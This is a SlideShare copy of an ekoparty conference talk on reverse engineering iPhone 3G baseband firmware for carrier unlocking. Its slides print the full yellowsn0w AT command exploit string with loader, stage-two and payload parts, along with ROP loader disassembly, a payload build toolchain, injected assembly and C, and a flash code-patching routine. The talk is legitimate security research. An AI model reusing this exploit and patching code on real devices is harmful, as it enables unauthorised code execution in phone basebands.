SlideShare ist ein Scribd-Unternehmen logo

The Baseband Playground

S
slides_luis

This document discusses exploring and exploiting baseband processors in smartphones through code injection and reverse engineering. It begins with background on basebands, then discusses static and dynamic reverse engineering techniques. It provides details on past exploits used to unlock the iPhone 3G baseband, including the yellowsn0w exploit which used an AT command parser vulnerability to execute code and perform the unlock. Code patching techniques are also mentioned.

TechnologieNews & Politik
1 von 80
Downloaden Sie, um offline zu lesen
BASEBAND PLAYGROUND ekoparty Security Conference 7° edición Luis Miras luis@ringzero.net @_luism
Thanks   This  talk  is  based  on  unlocks  and  informa4on   provided  by  the  following   •  Musclenerd                                                      @MuscleNerd   •  iPhone  Dev  Team                                  @iphone_dev   •  Geohot                                                      hAp://geohot.com   •  iPhone  Wiki              hAp://theiphonewiki.com  
What  is  talk  about   •  Exploring  basebands  via  code  injec4on   •  Crea4ng  a  development  environment   •  Reverse  Engineering,  sta4c  and  dynamic   •  Code  patching  techniques  
What  is  not  covered   •  Remote  exploita4on.  See:   –   Ralf-­‐Philipp  Weinmann  “The  Baseband   Apocalypse”   •  hAp://www.youtube.com/watch?v=CPPQ8vA6cRc   –  Grugq  “Base  Jumping”   •  hAps://media.blackhat.com/bh-­‐ad-­‐10/Grugq/BlackHat-­‐ AD-­‐2010-­‐Gurgq-­‐Base-­‐Jumping-­‐slides.pdf   •  Non  public  unlocks  
Contents   •  Baseband  Background   •  Sta4c  Reverse  Engineering   •  Development  Environment   •  Dynamic  Reverse  Engineering   •  Patching  Code   •  Conclusion  
BASEBAND BACKGROUND
What  is  a  baseband?   •  Baseband  is  short  for  baseband  processor.   •  For  this  talk  only  talking  about  smartphones   •  Can  be  a  separate  chip  or  a  separate  core  
What  is  a  baseband?   •  Controls/Interfaces  with  hardware   –  Audio,  voice  and  mp3  codecs   –  Video  display   –  Camera   –  USB   –  GPS   –  WiFi   –  Bluetooth,  etc  
What  is  a  baseband?   •  Provides  communica4on  protocols   –  GSM   –  GPRS   –  Edge   –  UMTS  
What  is  a  baseband?   •  Generally  ARM  core   •  Basebands  run  small  RTOS   –  iPhone,  iPhone  3G,  iPhone  3GS  uses  Nucleus   –  iPhone  4  uses  ThreadX   –  Qualcomm  chips  use  OKL4   •  OsmocoBB   –  Open  Source  GSM  implementa4on   –  Motorola  C123  and  friends  (feature  phone)   –  hAp://bb.osmocom.org  
What  is  a  baseband?   •  Applica4on/Baseband  communica4on   –  Shared  memory   –  AT  commands  over  high  speed  serial  lines  
What  is  a  baseband?   •  Applica4on/Baseband  communica4on   –  Shared  memory   –  AT  commands  over  high  speed  serial  lines   AT  commands  ?  
What  is  a  baseband?   •  Applica4on/Baseband  communica4on   –  Shared  memory   –  AT  commands  over  high  speed  serial  lines  
What  is  a  baseband?   •  Applica4on/Baseband  communica4on   –  Shared  memory   –  AT  commands  over  high  speed  serial  lines   at+cnum +CNUM: "","15555551212",129 OK at+cgsn 011770000000000 OK
What  is  an  unlock?   •  A  carrier  lock  prevents  phone’s  use  on  other   networks.   •  An  unlock  removes  this  restric4on.   •  Some  phones  require  numeric  password  to   unlock.   •  Other  unlocks  patch  bootloader/firmware,   removing  checks.  ex.  original  iPhone  
iPhone  3G  unlock     •  First  unlock  was  released  by  iPhone  Dev  Team,   yellowsn0w.   •  It  exploits  an  AT  command  parser  vuln   execu4ng  arbitrary  code  in  the  baseband   •  Payload  uses  Nucleus  API  to  perform  unlock   •  The  unlock  is  not  permanent.  
Infineon  X-­‐Gold  608  /  XMM  6080   •  Baseband  used  in  iPhone  3G(S)  and  iPad1  3G   •  ARM  926  Core   •  Nucleus  RTOS   •  Selected  as  test  case  because  of  unlock   (exploit)  availability  
Baseband  Unlocks   Unlock   Baseband(s)   Firmware     Vector   yellowsn0w  [1]   02.28.00   2.2                                  3G   AT+STKPROF   ultrasn0w        [1]   04.26.08   3.0,  3.0.1            3G(S)   AT+XLOCK   05.11.07   3.1,  3.1.2            3G(S)   AT+XAPP   05.12.01   3.1.3                            3G(S)   AT+XAPP   05.13.04   4.0  –  4.0.2        3G(S)   AT+XAPP   06.15.00  [3]   3.2  –  3.2.2        iPad1   AT+XAPP   purplesn0w  [2]   04.26.08   3.0,  3.0.1            3G(S)   AT+XLOCK   blacksn0w        [2]   05.11.07   3.1,  3.1.2            3G(S)   AT+XEMM  (heap)   1.  iPhone  dev  team   2.  Geohot   3.  iPad1  baseband.  iPhone  3G(S)  will  lose  GPS  func4onality   NOTE:  Downgrades  are  generally  not  possible  except  for  a  specific  early   release  3G  bootloader.  
What  is  Nucleus?   •  It  is  a  RTOS  developed  by  Mentor  Graphics.   –  Downloadable  trial  available   •  Closed  source,  but  clients  get  source  code.   •  Runs  on  mul4ple  CPUs   •  2.84  Billion  devices  by  end  of  2010   •  C/C++  development  environment  using  Code   Sourcery  tools  
UNLOCK WALKTHROUGH
AT+STKPROF  Exploit   •  This  is  the  vector  yellowsn0w  used.   •  Source  code  was  released   •  Payload  disassembly  provided:                hAp://theiphonewiki.com/wiki/index.php?4tle=Yellowsn0w   •  I  will  highlight  some  interes4ng  areas   •  Exploit  has  3  parts   –  loader   –  stage2   –  payload  
AT+STKPROF   at+stkprof=1,"064a541c044b1878222803d0107001320133f8e720470000bf 9f154000170100546e5640200000005c130100266e5640ddddddddeeeeeeeeb8 905120000000001010101020202020611301000c000000";"x10x32x0Fx27 xBAx43x17x1Cx0ExA4x0BxA5x01x35x21x78x78x29x0CxD0 xA8x47x0Bx01x61x78xA8x47xC0x46xC0x46xC0x46xC0x46 xC9x18x11x70x02x34x01x32xEFxE7xC0x46xC0x46x01x37 x38x47x30x30x41x29x01xDA09pG79pG024803A1013101601FBD0000 4C711140F0B51C4B80268BB03601188008911A4C301CA047002509909820A047 071CC56080204000A047802214495200144B041C9847099B0193442303930A23 013405930C23221C06930F49009502960495381C00230D4CA047021C002804D1 0B4908980B4B984703E00B490898094B98470BB0F0BD000044B33B40AC201420 641A0100A0583C20481A010040B53F20541A010000DD4620581A010064657674 65616D31000000004F4B21004552524F522025640000000030B5114D85B0114B 281C6946FF229847009B0D2B11D101990D4B0A681A6004334A681A608A680B4B 13600B4B53600B4B93600123CB6020230093281C6946FF22074B9847DFE70000 5427234098591620BC792F4000FF0001010402040304040468D53E20xx”
AT+STKPROF   at+stkprof=1,"064a541c044b1878222803d0107001320133f8e720470000bf <- loader 9f154000170100546e5640200000005c130100266e5640ddddddddeeeeeeeeb8 905120000000001010101020202020611301000c000000";"x10x32x0Fx27 xBAx43x17x1Cx0ExA4x0BxA5x01x35x21x78x78x29x0CxD0 xA8x47x0Bx01x61x78xA8x47xC0x46xC0x46xC0x46xC0x46 xC9x18x11x70x02x34x01x32xEFxE7xC0x46xC0x46x01x37 x38x47x30x30x41x29x01xDA09pG79pG024803A1013101601FBD0000 4C711140F0B51C4B80268BB03601188008911A4C301CA047002509909820A047 071CC56080204000A047802214495200144B041C9847099B0193442303930A23 013405930C23221C06930F49009502960495381C00230D4CA047021C002804D1 0B4908980B4B984703E00B490898094B98470BB0F0BD000044B33B40AC201420 641A0100A0583C20481A010040B53F20541A010000DD4620581A010064657674 65616D31000000004F4B21004552524F522025640000000030B5114D85B0114B 281C6946FF229847009B0D2B11D101990D4B0A681A6004334A681A608A680B4B 13600B4B53600B4B93600123CB6020230093281C6946FF22074B9847DFE70000 5427234098591620BC792F4000FF0001010402040304040468D53E20xx”
AT+STKPROF   at+stkprof=1,"064a541c044b1878222803d0107001320133f8e720470000bf 9f154000170100546e5640200000005c130100266e5640ddddddddeeeeeeeeb8 905120000000001010101020202020611301000c000000";"x10x32x0Fx27 xBAx43x17x1Cx0ExA4x0BxA5x01x35x21x78x78x29x0CxD0 <- stage2 xA8x47x0Bx01x61x78xA8x47xC0x46xC0x46xC0x46xC0x46 xC9x18x11x70x02x34x01x32xEFxE7xC0x46xC0x46x01x37 x38x47x30x30x41x29x01xDA09pG79pG024803A1013101601FBD0000 4C711140F0B51C4B80268BB03601188008911A4C301CA047002509909820A047 071CC56080204000A047802214495200144B041C9847099B0193442303930A23 013405930C23221C06930F49009502960495381C00230D4CA047021C002804D1 0B4908980B4B984703E00B490898094B98470BB0F0BD000044B33B40AC201420 641A0100A0583C20481A010040B53F20541A010000DD4620581A010064657674 65616D31000000004F4B21004552524F522025640000000030B5114D85B0114B 281C6946FF229847009B0D2B11D101990D4B0A681A6004334A681A608A680B4B 13600B4B53600B4B93600123CB6020230093281C6946FF22074B9847DFE70000 5427234098591620BC792F4000FF0001010402040304040468D53E20xx”
AT+STKPROF   at+stkprof=1,"064a541c044b1878222803d0107001320133f8e720470000bf 9f154000170100546e5640200000005c130100266e5640ddddddddeeeeeeeeb8 905120000000001010101020202020611301000c000000";"x10x32x0Fx27 xBAx43x17x1Cx0ExA4x0BxA5x01x35x21x78x78x29x0CxD0 xA8x47x0Bx01x61x78xA8x47xC0x46xC0x46xC0x46xC0x46 xC9x18x11x70x02x34x01x32xEFxE7xC0x46xC0x46x01x37 x38x47x30x30x41x29x01xDA09pG79pG024803A1013101601FBD0000 <- payload 4C711140F0B51C4B80268BB03601188008911A4C301CA047002509909820A047 071CC56080204000A047802214495200144B041C9847099B0193442303930A23 013405930C23221C06930F49009502960495381C00230D4CA047021C002804D1 0B4908980B4B984703E00B490898094B98470BB0F0BD000044B33B40AC201420 641A0100A0583C20481A010040B53F20541A010000DD4620581A010064657674 65616D31000000004F4B21004552524F522025640000000030B5114D85B0114B 281C6946FF229847009B0D2B11D101990D4B0A681A6004334A681A608A680B4B 13600B4B53600B4B93600123CB6020230093281C6946FF22074B9847DFE70000 5427234098591620BC792F4000FF0001010402040304040468D53E20xx”
Loader   RAM:00011360 loader RAM:00011360 LDR R2, =0x11700 ; unused ram to place code RAM:00011362 ADDS R4, R2, #1 ; thumb switch RAM:00011364 LDR R3, =0x40159FBF ; location of stage2+payload in mem RAM:00011366 copy_loop RAM:00011366 LDRB R0, [R3] ; copy till quotes RAM:00011368 CMP R0, #0x22 RAM:0001136A BEQ run RAM:0001136C STRB R0, [R2] RAM:0001136E ADDS R2, #1 RAM:00011370 ADDS R3, #1 RAM:00011372 B copy_loop RAM:00011374 run RAM:00011374 BX R4 ; stage2 RAM:00011376 DCW 0 RAM:00011378 dword_11378 DCD 0x40159FBF RAM:0001137C dword_1137C DCD 0x11700 Original disasm on iPhone wiki
Loader   •  Loader  is  a  standard  copy  loop   •  Dwords  following  loader  are  interes4ng:   RAM:00011380 DCD 0x40566E54 RAM:00011384 DCD 0x20 RAM:00011388 DCD 0x1135C ; R4 used in bytecopy RAM:0001138C DCD 0x40566E26 ; R5 used in bytecopy, has loader code RAM:00011390 DCD 0xDDDDDDDD ; padding RAM:00011394 DCD 0xEEEEEEEE ; padding RAM:00011398 DCD 0x205190B8 ; <- ys_bytecode_rop(R4 + 4, R5 + 0x12, 0x50) RAM:0001139C DCD 0 ; padding RAM:000113A0 DCD 0x10101010 ; padding RAM:000113A4 DCD 0x20202020 ; padding RAM:000113A8 DCD 0x11361 ; return into loader code (0x11360+Thumb) RAM:000113AC DCD 0xC  
Loader   •  When  entering  the  following  code  snippet,   •  R4  =  0x1135C  and  R5  =  0x40566E26,     ROM:205190B8 ADD R1, R5, #0x12 ; R1 = 0x40566E26 + 0x12 = 0x40566E38 ROM:205190BC ADD R0, R4, #4 ; R0 = 0x1135C + 4 = 0x11360 ROM:205190C0 BL bytecpy ROM:205190C4 LDMFD SP!, {R4-R6,PC} Performs  bytecpy(0x11360,  0x40566E38,  R2)   R2  happens  to  be  0x50  
Loader   •  Loader  is  a  standard  copy  loop   •  Dwords  following  loader  are  interes4ng:   RAM:00011380 DCD 0x40566E54 RAM:00011384 DCD 0x20 RAM:00011388 DCD 0x1135C ; R4 used in bytecopy RAM:0001138C DCD 0x40566E26 ; R5 used in bytecopy, has loader code RAM:00011390 DCD 0xDDDDDDDD ; padding RAM:00011394 DCD 0xEEEEEEEE ; padding RAM:00011398 DCD 0x205190B8 ; <- ys_bytecode_rop(R4 + 4, R5 + 0x12, 0x50) RAM:0001139C DCD 0 ; padding RAM:000113A0 DCD 0x10101010 ; padding RAM:000113A4 DCD 0x20202020 ; padding RAM:000113A8 DCD 0x11361 ; return into loader code (0x11360+Thumb) RAM:000113AC DCD 0xC  
Stage2   •  Stage2  decodes,  aka  unhexlify(),  the  payload   and  jumps  into  it.   •  Can  be  viewed  on  iPhone  Wiki.   •  Note:  payload  loading  address  is  based  on  size   of  payload.   •  This  is  fixed  in  ultrasn0w  
Payload   Payload  consists  of  three  func4ons   •  handler_replace()  –  changes  sot  reset  handler   ptr  to  new_handler   •  new_handler()  –  creates  a  new  task  using   NU_Create_Task()   •  task_loop()  –  sends  a  message  to  the  Security   Mailbox  (IPC)  
Payload   •  The  new_handler()  func4on  is  ideal  for   modifica4on.   •  It  will  be  called  during  sot  reset  
Disassembly  4ps   •  ARM  must  be  4  byte  aligned,  Thumb  2  byte   aligned   •  If  disasm  not  aligning,  make  3  copies  with   extra  character  in  front:   x06x4ax54x1cx04x4bx18… Ax06x4ax54x1cx04x4bx18… AAx06x4ax54x1cx04x4bx18… AAAx06x4ax54x1cx04x4bx18… •  See  which  makes  best  code   –  Try  both  ARM  and  Thumb  mode  (ALT-­‐G)  
Disassembly  Tips   •  Make  segments  for  loader,  stage2,  etc   –  Load  Addi%onal  Binary  File  with  different  offsets   –  Or  make  manual  segments  and  copy  bytes   •  Use  IDA  and  QEMU  to  run  code  snippets   –  Works  great  for  tes4ng  custom  injected  code  later   on.              hAp://www.hexblog.com/?p=111  
STATIC REVERSE ENGINEERING
Choosing  a  Baseband  Version   •  We  need  an  unlockable  version   –  Generally  can’t  downgrade   •  This  talk  is  using  an  old  version  02.28.00   –  Started  ater  yellowsn0w  release,  stopped   working  on  this,  and  recently  restarted   –  Test  phone  was  never  upgraded   –  Techniques  applicable  to  other  versions  
Extrac4ng  Baseband  Image   •  iPhone  firmware  comes  in  ipsw  (aka  zip)  files.     •  Baseband  firmware  is  in  the  “restore”  dmg   •  The  restore  image  needs  to  be  decrypted   using  img3decrypt  or  xpwntool   •  Keys  are  listed  on  iPhone  wiki   •  Path  is  usr/local/standalone/firmware/   •  File  extension  is  .fls,  ex:  ICE2_04.26.08.fls  
IDA  Pro   •  iPhone  wiki  has  loading  instruc4ons                hAp://theiphonewiki.com/wiki/index.php?4tle=IDA_Pro_Setup   •  Unfortunately  IDA  Pro  doesn’t  find  very  many   func4ons.   •  The  baseband  has  both  ARM  and  Thumb  code.   •  ALT-­‐G  changes  the  CPU  mode.  0  =  ARM,  1  =   Thumb  
IDA  Pro   •  A  script  is  needed  to  find  common  prologues   (ARM  and  Thumb)   •  Script  should   –  Change  mode  if  needed   –  Create  code   –  Create  a  func4on  
IDA  Pro   •  Original  disassembly  has  3440  func4ons     •  Ater  running  the  script,  disassembly  has   33284  func4ons    
IDA  Pro   •  The  script  isn’t  perfect.   •  Lots  of  fixups  s4ll  needed   •  itsme  idc  scripts  are  useful  for  data   –  Table(“od”);  //  creates  offset,  data   •  Many  strings  aren’t  defined   –  itsme  script  assumes  4  byte  aligned  strings   •  Remember  Thumb  func4on  pointer  are   address  +  1  
IDA  Pro   •  Start  using  known  func4on  address  from   exploit  disasm,  ex  NU_Create_Task   •  Locate  nucleus  library  files,  preferably  ARM   –  I  believe  there  is  now  a  downloadable  demo   •  Bindiff  can  be  used   •  Look  for  specific  constants  used  as   immediates  in  IDA   –  TASK  is  0x5441534B   –  HISR  is  0x48495352  
Some  Interes4ng  Strings   ROM:20623462 fbi_bits ROM:204B33D4 I don't like you. Go 'way. ROM:203315B7 I2S1 Bluetooth ROM:204BE8AC heap internal error ( memory overwriting? ) ROM:20109794 IMEI check failed for IMEI[%d]=%cn ROM:20547DF4 Not implemented functionality. ROM:203AA51C WARNING: NMEA buffer %s is too small %d<100n ROM:20412E60 UMTS Serving Cell: ROM:204546BC GPS~ E911 Agps Allowed Time set to %d s.n ROM:205133A0 ../../umts/design/ue-rrc/text/urrcm_l3_handle_cells.c
DEVELOPMENT ENVIRONMENT
Development  Environment   Need  to  :   1.  Compile  our  assembly  code   2.  Strip  out  the  essen4al  code  and  do  reloc   fixups   3.  Package  code  in  proper  format  for  exploit  
Compiler   •  Using  Code  Sourcery  Lite  under  Linux   –  Code  Sourcery  runs  under  Windows  as  well   –  X  Code  will  compile  (mach-­‐o  vs.  ELF  object  files)   hAp://www.codesourcery.com/sgpp/lite/arm/portal/release1802   •  The  tar  version  works    
Makefile   CROSS_COMPILE=~/arm-2011.03/bin/arm-none-eabi- CC=${CROSS_COMPILE}gcc CFLAGS=-mcpu=arm926ej-s CFLAGS+=-mthumb all: asm.o @echo "[*] building payload.bin" @python build_payload.py ys asm.o @echo "[*] done." asm.o: asm.s @echo "[*] compiling asm.s => asm.o" @$ $(CC) $(CFLAGS) -c asm.s clean: rm -f *.o *~ *.bin
Build  script   •  A  python  script  is  called  during  the  build   –  Finds  .text  sec4on   –  Gets  raw  code   –  Performs  reloca4on  fixes   •  Must  know  loading  address,  exploit  specific   –  Packages  payload  in  usable  exploit  format  
Build  script   Usage: build_payload.py [options] payload_type objectfile.o Required args: payload_type - type of payload, valid types: ys - yellowsn0w ysr - yellowsn0w raw idt - injection dev tool (must set a base address, '-b') objectfile.o - file to strip payload_type from Options: --version show program's version number and exit -h, --help show this help message and exit -b BASE_ADDR, --base_addr=BASE_ADDR base address (idt payload_type only) -a, --arm_entry starting addr is arm, default is Thumb -q, --quiet
Code  injec4on   •  Modified  version  of  yellowsn0w  reads  in   payload.bin  file.   •  The  file  contains  the  AT+STKPROF  command   •  Used  in  single  shot  mode  
Sample  assembly     .text /* .datas */ .align 2 .align 4 .code 16 jumptable_addr: _new_handler: .long 0x403BB344 push {r4-r7,lr} sprintf: ldr r3, jumptable_addr .long 0x2046DD00 strh r0, [r3] ptr_my_response: mov r0, r1 .long my_response ldr r1, ptr_my_response my_response: ldr r3, sprintf .ascii "y0h! all up in ur blx r3 basebands!!!0” pop {r4-r7,pc}
Sample  C   #define BYTECPY(x) void* (* x)(void*, void*, unsigned int) #define BYTECPY_ADDR (void* (*)(void*, void*, unsigned int)) 0x203C58A0 int test(void) { void* dest = (void*)0x11300; void* src = (void*)0x2026B0F8; BYTECPY(my_bytecpy) = BYTECPY_ADDR; my_bytecpy(dest,src,4); return 0; }
Debugging   •  No  interac4ve  debugging   •  Crash  excep4on  if  we  are  lucky     1.  Call  the  magic  number,  *#5005*78283#   2.  Reply   3.  Pick  a  descrip4on   4.  Look  in  /var/logs/CrashReporter/Baseband
Crash  dump  (cleaned  up)   +XLOG: Exception Number: 1 Trap Class: 0xBBBB (HW PREFETCH ABORT TRAP) System Stack: [ snip ] 0x2030A740 0x20402049 0x20407ABD 0x2026D300 0x202CB7A3 Date: 10.09.2011 Time: 03:59:15 Register: r0: 0x0000000C r1: 0x1C544A06 r2: 0x00000050 r3: 0x20512A51 r4: 0x5F04044A r5: 0x5F05054A r6: 0x5F06064A r7: 0x5F07074A r8: 0x00000000 r9: 0x00000000 r10: 0x40565AA8 r11: 0x4056BAA8 r12: 0x45564E54 r13: 0x40566E98 r14: 0x20512A57 r15: 0x5F080848 SPSR: 0x00000013 DFAR: 0xFFFFCFFF DFSR: 0x00000005 OK
Debugging  
Debugging   •  As  can  be  seen,  Debugging  is  preAy  caveman   •  Once  we  can  modify  code,  excep4ons  could   be  forced  (invalid  instruc4on)  and  registers   inspected.   •  Ideally  could  patch  vector  table  in  high   memory  and  make  our  own  excep4on   handler.  
DYNAMIC REVERSING
Dynamic  Reversing   •  The  first  thing  we  should  do  is  dump  memory.   •  I  found  a  memory  dump  of  02.28.00  online   which  appears  to  be  gone.   •  Within  the  dump  I  found  code  to  a  very  useful   tool.   •  I  don’t  know  who  wrote  it,  but  thanks  :)  
Dynamic  Reversing   •  I  refer  to  the  tool  as  IDT,  injec4on   development  tool.   •  The  usage  is:   usage: at@reset(cmd,addr,size,{byte array}) cmd: 1-read,2-write,3-call •  I  packaged  the  tool  into  a  AT+STKPROF   payload  
Dynamic  Reversing   •  Memory  can  now  be  dumped   •  Memory  map  courtesy  of  iPhone  wiki:  
Dynamic  Reversing   •  Interes4ng  memory  is  in  low  memory,  RAM,   and  high  memory   •  The  goal  is  to  add  these  into  IDA   –  Keep  in  mind  that  RAM  is  just  a  snapshot  in  4me    
Combining  dumps  into  IDA   This  example  loads  a  file  dump_FFFF0000_10000.bin   1.  File  -­‐>  LoadFile  -­‐>  Addi4onal  Binary  File   2.  Presented  with  a  menu  (changed  the  following)      Loading  segment:  0xffff000    //  paragraphs  aka  /0x10      Number  of  bytes:    0xfffc      //  cant  have  address  wrap  to  0   3.  Change  selectors      This  makes  displayed  addresses  appear  correctly      View  -­‐>  Open  Subviews  -­‐>  Selectors      Change  values  to  zero  
Exploring  memory   •  One  of  the  original  yellowsn0w  demos  was  a  ps   lis4ng  of  running  tasks.   •  I  implemented  this  in  idapython  in  the  combined   idb.   •  Simple  code  ater  learning  the  NU_TASK   structure   •  NU_TASK  includes  process  name  and  address  for   entry  func4on     •  Script  renames  entry  func4on  using  process   name  
Exploring  Memory   [+] Collecting NU_TASKs 0x205675b9 dll:1[35] 0x205675b9 dll:2[35] 0x20594189 rrc:1[55] 0x202cb1c5 atc:1[85] 0x205b5ddd xdr:1[50] 0x2056a8c9 gps:1[90] 0x204d8a15 mon[120] 0x204043dd ata[84] 0x204429a9 io_evt[60] 0x202fcd2c sec[69] 0x202c8f4c xdrv_dat[150] 0x203e5e1c DMA[255] NOTE: select set of tasks for display
Exploring  Memory     •  Similar  things  can  be  done  with  other   resources   –  HISR   –  Semaphores   –  Etc.  
Exploring  Memory   •  This  is  a  rough  overview  of  what  is  found  in   memory     Address   Contents   0x0000-0xFFFF TLB,  RAM,  code   0x40000000-0x407fffff RAM,  Global  Variables,  General  RAM   0xffff0000-0xffffffff Vector  Table,  API  func4ons,  pointers  
PATCHING CODE
Patching  Code   •  Up  to  this  point  only  have  been  able  to  run   code  that  uses  provided  APIs   •  Ideally  we  want  to  modify  exis4ng  code.   •  The  code  we  want  to  modify  is  in  ROM  (flash).   •  purplesn0w  uses  code  patching  to  perform  its   unlock      source code: http://apt.geohot.com/purplesn0w_source.zip
Patching  Code   1.  Disable  interrupts   2.  Copy  the  page   3.  Patch  it   4.  MMU  disable   5.  Write  to  TLB   6.  Invalidate  TLB   7.  MMU  enable   8.  Flush  instruc4on  cache   9.  Enable  interrupts  
Patching  Code   /* PATCHES here: */ LDR R0, =0x4306B0F8 STR R1, [R0] ADD R0, R0, #4 LDR R1, =0x646c6f6c STR R2, [R0] LDR R2, =0x7a676e30 ADD R0, R0, #4 LDR R3, =0x7265765f STR R3, [R0] LDR R4, =0x6e6f6973 ADD R0, R0, #4 LDR R5, =0x7325203a STR R4, [R0] MOV R6, #0 ADD R0, R0, #4 STR R5, [R0] ADD R0, R0, #4 STR R6, [R0] /* **************************** */
Patching  Code   Original: Patched: at+xgendata at+xgendata +XGENDATA: " +XGENDATA: " "ICE2_MODEM_02.28.00", "ICE2_MODEM_02.28.00", "EEP_VERSION:526", "EEP_VERSION:526", "EEP_REVISION:0", "EEP_REVISION:0", “BOOTLOADER_VERSION: 5.9_M3S2", 1,0 "lold0ngz_version: 5.9_M3S2",1,0 OK OK NOTE: edited and trimmed for display purposes
Patching  Code   •  At  this  point,  we  can  add  hooking  code.   •  Can  add  debugging  logging  removed  in  release   build   •  Can  modify  the  vector  table  in  high  memory   and  write  our  own  excep4on  handler,  aka  our   own  debugger    
Patching  Code   •  Many  interes4ng  areas  of  code  to  modify   •  The  main  Tasks  are  good  star4ng  points.   •  The  GSM  and  UMTS  code  has  many  strings,   making  iden4fica4on  easy   •  Appear  to  be  internal  tes4ng  tools  and   scrip4ng  in  firmware.   •  Should  only  be  done  on  a  test  network   •  Check  with  any  laws  in  your  area  
CONCLUSION
Conclusion   •  Baseband  is  just  another  embedded  system.   •  Using  unlocks  allows  for  run4me  access.   •   Combining  run4me  access  with  a   development  environment  and  exis4ng  RE   methods  allows  for  easy  explora4on.  
Ques4ons?  

Empfohlen

Early Software Development through Palladium Emulation
Early Software Development through Palladium EmulationEarly Software Development through Palladium Emulation
Early Software Development through Palladium EmulationRaghav Nayak
 
Running Android on the Raspberry Pi: Android Pie meets Raspberry Pi
Running Android on the Raspberry Pi: Android Pie meets Raspberry PiRunning Android on the Raspberry Pi: Android Pie meets Raspberry Pi
Running Android on the Raspberry Pi: Android Pie meets Raspberry PiChris Simmonds
 
Android Audio System
Android Audio SystemAndroid Audio System
Android Audio SystemYi-Hsiang Huang
 
Secureboot Survival Guide
Secureboot Survival GuideSecureboot Survival Guide
Secureboot Survival Guidelcplcp1
 
Finding Bugs Faster with Assertion Based Verification (ABV)
Finding Bugs Faster with Assertion Based Verification (ABV)Finding Bugs Faster with Assertion Based Verification (ABV)
Finding Bugs Faster with Assertion Based Verification (ABV)DVClub
 
Multicore and AUTOSAR
Multicore and AUTOSARMulticore and AUTOSAR
Multicore and AUTOSARHansang Lee
 
USB Drivers
USB DriversUSB Drivers
USB DriversAnil Kumar Pugalia
 
Embedded linux network device driver development
Embedded linux network device driver developmentEmbedded linux network device driver development
Embedded linux network device driver developmentAmr Ali (ISTQB CTAL Full, CSM, ITIL Foundation)
 

Empfohlen

Early Software Development through Palladium Emulation
Early Software Development through Palladium EmulationEarly Software Development through Palladium Emulation
Early Software Development through Palladium EmulationRaghav Nayak
 
Running Android on the Raspberry Pi: Android Pie meets Raspberry Pi
Running Android on the Raspberry Pi: Android Pie meets Raspberry PiRunning Android on the Raspberry Pi: Android Pie meets Raspberry Pi
Running Android on the Raspberry Pi: Android Pie meets Raspberry PiChris Simmonds
 
Android Audio System
Android Audio SystemAndroid Audio System
Android Audio SystemYi-Hsiang Huang
 
Secureboot Survival Guide
Secureboot Survival GuideSecureboot Survival Guide
Secureboot Survival Guidelcplcp1
 
Finding Bugs Faster with Assertion Based Verification (ABV)
Finding Bugs Faster with Assertion Based Verification (ABV)Finding Bugs Faster with Assertion Based Verification (ABV)
Finding Bugs Faster with Assertion Based Verification (ABV)DVClub
 
Multicore and AUTOSAR
Multicore and AUTOSARMulticore and AUTOSAR
Multicore and AUTOSARHansang Lee
 
USB Drivers
USB DriversUSB Drivers
USB DriversAnil Kumar Pugalia
 
Embedded linux network device driver development
Embedded linux network device driver developmentEmbedded linux network device driver development
Embedded linux network device driver developmentAmr Ali (ISTQB CTAL Full, CSM, ITIL Foundation)
 
Frequently Asked Question (FAQ's) on ISO 26262 Functional Safety
Frequently Asked Question (FAQ's) on ISO 26262 Functional SafetyFrequently Asked Question (FAQ's) on ISO 26262 Functional Safety
Frequently Asked Question (FAQ's) on ISO 26262 Functional SafetyEmbitel Technologies (I) PVT LTD
 
LCU13: An Introduction to ARM Trusted Firmware
LCU13: An Introduction to ARM Trusted FirmwareLCU13: An Introduction to ARM Trusted Firmware
LCU13: An Introduction to ARM Trusted FirmwareLinaro
 
Qemu Pcie
Qemu PcieQemu Pcie
Qemu PcieThe Linux Foundation
 
Introduction to char device driver
Introduction to char device driverIntroduction to char device driver
Introduction to char device driverVandana Salve
 
HKG15-505: Power Management interactions with OP-TEE and Trusted Firmware
HKG15-505: Power Management interactions with OP-TEE and Trusted FirmwareHKG15-505: Power Management interactions with OP-TEE and Trusted Firmware
HKG15-505: Power Management interactions with OP-TEE and Trusted FirmwareLinaro
 
Audio Drivers
Audio DriversAudio Drivers
Audio DriversAnil Kumar Pugalia
 
Yocto Project Open Source Build System and Collaboration Initiative
Yocto Project Open Source Build System and Collaboration InitiativeYocto Project Open Source Build System and Collaboration Initiative
Yocto Project Open Source Build System and Collaboration InitiativeMarcelo Sanz
 
Linux device drivers
Linux device drivers Linux device drivers
Linux device drivers Emertxe Information Technologies Pvt Ltd
 
Linux on ARM 64-bit Architecture
Linux on ARM 64-bit ArchitectureLinux on ARM 64-bit Architecture
Linux on ARM 64-bit ArchitectureRyo Jin
 
LAS16-402: ARM Trusted Firmware – from Enterprise to Embedded
LAS16-402: ARM Trusted Firmware – from Enterprise to EmbeddedLAS16-402: ARM Trusted Firmware – from Enterprise to Embedded
LAS16-402: ARM Trusted Firmware – from Enterprise to EmbeddedLinaro
 
U boot-boot-flow
U boot-boot-flowU boot-boot-flow
U boot-boot-flowBabuSubashChandar Chandra Mohan
 
Test summary Report :A Detailed Guide
Test summary Report :A Detailed GuideTest summary Report :A Detailed Guide
Test summary Report :A Detailed GuideProfessional QA
 
Adaptive AUTOSAR - The New AUTOSAR Architecture
Adaptive AUTOSAR - The New AUTOSAR ArchitectureAdaptive AUTOSAR - The New AUTOSAR Architecture
Adaptive AUTOSAR - The New AUTOSAR ArchitectureAdaCore
 
20160706 Automotive SYS: "Evolving Needs for Software Systems - Demonstrated"
20160706 Automotive SYS: "Evolving Needs for Software Systems - Demonstrated"20160706 Automotive SYS: "Evolving Needs for Software Systems - Demonstrated"
20160706 Automotive SYS: "Evolving Needs for Software Systems - Demonstrated"Alexander Much
 
Quick and Easy Device Drivers for Embedded Linux Using UIO
Quick and Easy Device Drivers for Embedded Linux Using UIOQuick and Easy Device Drivers for Embedded Linux Using UIO
Quick and Easy Device Drivers for Embedded Linux Using UIOChris Simmonds
 
Develop Your Own Operating Systems using Cheap ARM Boards
Develop Your Own Operating Systems using Cheap ARM BoardsDevelop Your Own Operating Systems using Cheap ARM Boards
Develop Your Own Operating Systems using Cheap ARM BoardsNational Cheng Kung University
 
LCU14 500 ARM Trusted Firmware
LCU14 500 ARM Trusted FirmwareLCU14 500 ARM Trusted Firmware
LCU14 500 ARM Trusted FirmwareLinaro
 
Linux Char Device Driver
Linux Char Device DriverLinux Char Device Driver
Linux Char Device DriverGary Yeh
 
U-Boot Porting on New Hardware
